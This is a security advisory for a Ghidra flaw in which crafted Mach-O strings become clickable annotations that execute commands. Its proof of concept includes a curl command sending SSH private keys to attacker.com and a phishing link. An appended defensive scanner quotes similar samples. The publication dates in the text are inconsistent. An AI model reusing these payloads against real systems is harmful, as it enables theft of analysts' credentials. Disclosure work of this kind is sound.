CVE-2026-4946: NSA Ghidra Auto-Analysis Annotation Command Execution

A malicious binary can trigger arbitrary command execution in Ghidra when an analyst clicks on auto-generated comments.

AHA! has discovered an issue with Ghidra from the National Security Agency (NSA), and is publishing this disclosure in accordance with AHA!’s standard disclosure policy today, on March 25, 2026. CVE-2026-4946 has been assigned to this issue, based on the original vulnerability disclosure GHSA-mc3p-mq2p-xw6v and demonstrated at a regular AHA! meeting by the discoverers.

This vulnerability is estimated to have a CVSS v3.1 rating of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (8.8, High), and the relevant SSVC vectors are Exploitation: PoC and Technical Impact: Total. This issue is an instance of CWE-78.

Any questions about this disclosure should be directed to [email protected].

Executive Summary

Ghidra versions prior to 12.0.3 improperly process annotation directives embedded in automatically extracted binary data, resulting in arbitrary command execution when an analyst interacts with the UI. Specifically, the @execute annotation—intended for trusted, user-authored comments—is also parsed in comments generated during auto-analysis (such as CFStrings in Mach-O binaries). This allows a crafted binary to present seemingly benign clickable text which, when clicked, executes attacker-controlled commands on the analyst’s machine.

This issue affects Ghidra versions prior to 12.0.3 and represents a failure to properly constrain execution of externally influenced input, consistent with CWE-78.

Technical Details

Ghidra includes a feature allowing annotations within comments, including an {@execute ...} directive, which renders a clickable link that executes a system command. This feature is intended for trusted, user-authored annotations.

However, Ghidra’s analysis pipeline applies this same annotation parsing logic to comments automatically derived from analyzed binaries.

The vulnerable code path is as follows:

  1. CFStringAnalyzer extracts string data from Mach-O binaries and generates repeatable comments in the Listing view.
  2. Annotation.java parses all comment text for annotation directives, including {@execute ...}.
  3. ExecutableTaskStringHandler.java executes commands via ProcessBuilder when a user clicks on the rendered annotation, with no confirmation dialog or validation.

Because the extracted CFString data originates from attacker-controlled binary input, an adversary can embed annotation payloads directly into a compiled binary.

A minimal proof-of-concept is shown below:

// poc.m
#import <CoreFoundation/CoreFoundation.h>

// Exfiltrate SSH keys - displays as "View_License"
CFStringRef g1 = CFSTR("{@execute /usr/bin/curl \"-sT/Users/Shared/.ssh/id_rsa http://attacker.com:8888/exfil\" View_License}");

// Open Calculator - displays as "Open_Documentation"  
CFStringRef g2 = CFSTR("{@execute /usr/bin/open -aCalculator Open_Documentation}");

// Create file on disk - displays as "Check_Updates"
CFStringRef g3 = CFSTR("{@execute /usr/bin/touch /tmp/RCE Check_Updates}");

// Open phishing URL - displays as "View_Source"
CFStringRef g4 = CFSTR("{@execute /usr/bin/open https://attacker.com/phishing View_Source}");

int main() { return 0; }

These strings appear in Ghidra’s Listing view as clickable labels such as “View_License” or “Open_Documentation.” When clicked, the embedded command is executed directly on the analyst’s system.

To reproduce:

  1. Compile a Mach-O binary containing CFStrings with embedded @execute annotations.
  2. Open the binary in Ghidra and allow auto-analysis to complete.
  3. Navigate to the __cfstring section in the Listing view.
  4. Click on the rendered comment links.

For more detailed reproduction steps, please see the original advisory from the NSA at GHSA-mc3p-mq2p-xw6v.

Observed results include:

  • Execution of arbitrary binaries (e.g., launching Calculator)
  • File system modification (e.g., creating files under /tmp)
  • Network exfiltration (e.g., sending SSH private keys to a remote listener)

At no point is the user warned that clicking these links will execute system commands, nor is there any restriction on what commands may be executed.

This represents a trust boundary violation between analyzed content and user interface behavior, where untrusted binary data is implicitly treated as trusted annotation input.
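As an added example (not from the advisory or from the Ghidra project), a small Python triage scanner that finds {@execute ...} annotations in a file's raw bytes and separates the clickable label from the command it would run, so a sample can be checked before it is opened in an unpatched Ghidra. It assumes the tokenisation seen in the PoC above (shell-style quoting, final token is the display text), which is an assumption about Ghidra's parser rather than a verified fact, and the sample bytes are constructed.

```python
import re
import shlex
import sys

# Constructed sample standing in for the raw bytes of a __cfstring-backed
# string table: one benign string, two @execute annotations, one @url.
SAMPLE_BYTES = (
    b"Usage: tool [options]\x00"
    b"{@execute /usr/bin/touch /tmp/RCE Check_Updates}\x00"
    b'{@execute /usr/bin/curl "-sT/Users/Shared/.ssh/id_rsa '
    b'http://attacker.example/exfil" View_License}\x00'
    b"{@url https://example.org Docs}\x00"
)

# Only {@execute ...} is command-bearing; other annotations are left alone.
EXECUTE_RE = re.compile(rb"\{@execute\b([^}]*)\}")


def find_execute_annotations(data: bytes):
    """Return [(label, argv), ...] for each {@execute ...} found in data.

    Assumption (matches the PoC in the advisory, not verified against
    Ghidra's parser): arguments use shell-style quoting and the final
    token is the text rendered as the clickable link.
    """
    findings = []
    for m in EXECUTE_RE.finditer(data):
        body = m.group(1).decode("utf-8", errors="replace").strip()
        try:
            tokens = shlex.split(body)
        except ValueError:          # unbalanced quotes: fall back to whitespace
            tokens = body.split()
        if len(tokens) < 2:         # need at least a command and a label
            continue
        findings.append((tokens[-1], tokens[:-1]))
    return findings


def scan_file(path: str):
    """Scan a whole file (e.g. a Mach-O sample) before loading it in Ghidra."""
    with open(path, "rb") as fh:
        return find_execute_annotations(fh.read())


if __name__ == "__main__":
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_execute_annotations(SAMPLE_BYTES)
    for label, argv in hits:
        print(f'link text "{label}" would run: {shlex.join(argv)}')
```

A non-empty result is a reason to refuse the sample on any Ghidra older than 12.0.3, where the fix is not present.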

Attacker Value

This vulnerability enables a novel and highly effective attack against reverse engineers and malware analysts. By embedding malicious annotation payloads into distributed binaries, an attacker can reliably achieve code execution on the systems of analysts who inspect those binaries in Ghidra. For example, an attacker could create a binary that intentionally triggers an EDR alert, prompting forensic analysis by a security analyst, which then, in turn, triggers the true payload of the attack. The requirement for user interaction (a click) is minimal, especially given that the UI presents these annotations as benign, helpful labels such as “View License” or “Open Documentation.”

Once compromised, the attacker could perform the following against the analyst’s forensic environment:

  • Exfiltration of sensitive analyst data, such as SSH keys or proprietary binaries
  • Execution of reconnaissance commands to fingerprint the analysis environment
  • Delivery of secondary payloads or persistent backdoors
  • Social engineering through deceptive UI elements that encourage interaction

Exploiting this vulnerability would be particularly effective in environments where analysts routinely inspect untrusted binaries, such as malware research labs, vulnerability research teams, and incident response operations. In these contexts, the ability to pivot from analyzed sample to analyst workstation represents a high-value target for both criminal and espionage actors.

Credit

This issue is being disclosed through the AHA! CNA and is credited to the Mobasi Security Team.

Timeline

  • 2026-02-19 (Thu): Vulnerability published as GHSA-mc3p-mq2p-xw6v
  • 2026-02-19 (Thu): Vendor released fixed version 12.0.3
  • 2026-03-27 (Thu): Presented at AHA! Meeting 0x00ea
  • 2026-03-29 (Sun): Published this advisory as CVE-2026-4946